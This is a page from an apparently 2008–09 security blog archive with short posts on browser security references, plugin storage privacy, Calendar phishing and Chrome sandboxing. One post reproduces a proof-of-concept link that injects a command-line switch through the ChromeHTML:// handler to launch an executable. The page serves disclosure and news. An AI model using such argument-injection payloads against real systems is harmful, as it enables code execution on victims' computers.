Sunday, January 4th, 2009
This document is meant to provide web application developers, browser engineers, and information security researchers with a one-stop reference to key security properties of contemporary web browsers. Insufficient understanding of these often poorly-documented characteristics is a major contributing factor to the prevalence of several classes of security vulnerabilities.
Although all browsers ...
Posted in Coding, Internet, Security | No Comments
Wednesday, December 31st, 2008
By now, most of us are aware of the potential privacy risks posed by Web cookies. But according to a new paper published by security consultancy iSec Partners, traditional browser-based cookies aren't the only technology used to store user data anymore. A number of browser plug-ins offer similar capabilities -- ...
Posted in Coding, Internet, Privacy, Security | No Comments
Monday, December 29th, 2008
In his blog, Graham Cluley of Sophos alerts his readers to the return of Google Calendar phishing attacks. Originally spotted in the summer, Google Calendar phishing uses event invitations to Calendar users asking them to "Verify Your Account" or face account deletion. Victims of this phish are asked to accept ...
Posted in Internet, Privacy, Security | No Comments
Tuesday, December 23rd, 2008
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html
click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>
Source:
http://www.milw0rm.com/exploits/7566
Posted in Coding, Internet, Security, Software | No Comments
Thursday, December 11th, 2008
The Google Chrome browser is no longer a beta, and has been outfitted with a coat of security armor Google hopes will both protect users and help Chrome compete with rival browsers.
The toughest piece of that armor involves sandboxing. In Chrome, HTML rendering and JavaScript execution are isolated in their ...
Posted in Coding, Internet, Privacy, Security | No Comments
Page 11 of 23« First«...910111213...20...»Last »
